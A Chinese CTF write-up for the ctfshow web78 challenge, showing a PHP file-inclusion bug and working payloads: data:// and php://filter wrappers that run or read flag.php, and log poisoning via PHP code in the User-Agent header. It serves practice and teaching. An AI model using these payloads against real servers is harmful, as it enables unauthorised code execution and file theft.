[ctfshow web入门] web78

信息收集

表面上没有任何过滤,自由发挥

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过,不再详细解释,有需要点击超链接:[ctfshow web入门] web32

伪协议

php 复制代码
?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

php 复制代码
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码
<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

web124    目录    web79

相关推荐
孤水寒月2 小时前
基于HTML的悬窗可拖动记事本
前端·css·html
祝余呀2 小时前
html初学者第一天
前端·html
一只栖枝3 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习3 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
耶啵奶膘4 小时前
uniapp+firstUI——上传视频组件fui-upload-video
前端·javascript·uni-app
视频砖家5 小时前
移动端Html5播放器按钮变小的问题解决方法
前端·javascript·viewport功能
lyj1689975 小时前
vue-i18n+vscode+vue 多语言使用
前端·vue.js·vscode
怦然星动_6 小时前
DHCP中继及动态分配
网络安全
小白变怪兽7 小时前
一、react18+项目初始化(vite)
前端·react.js
ai小鬼头7 小时前
AIStarter如何快速部署Stable Diffusion?**新手也能轻松上手的AI绘图
前端·后端·github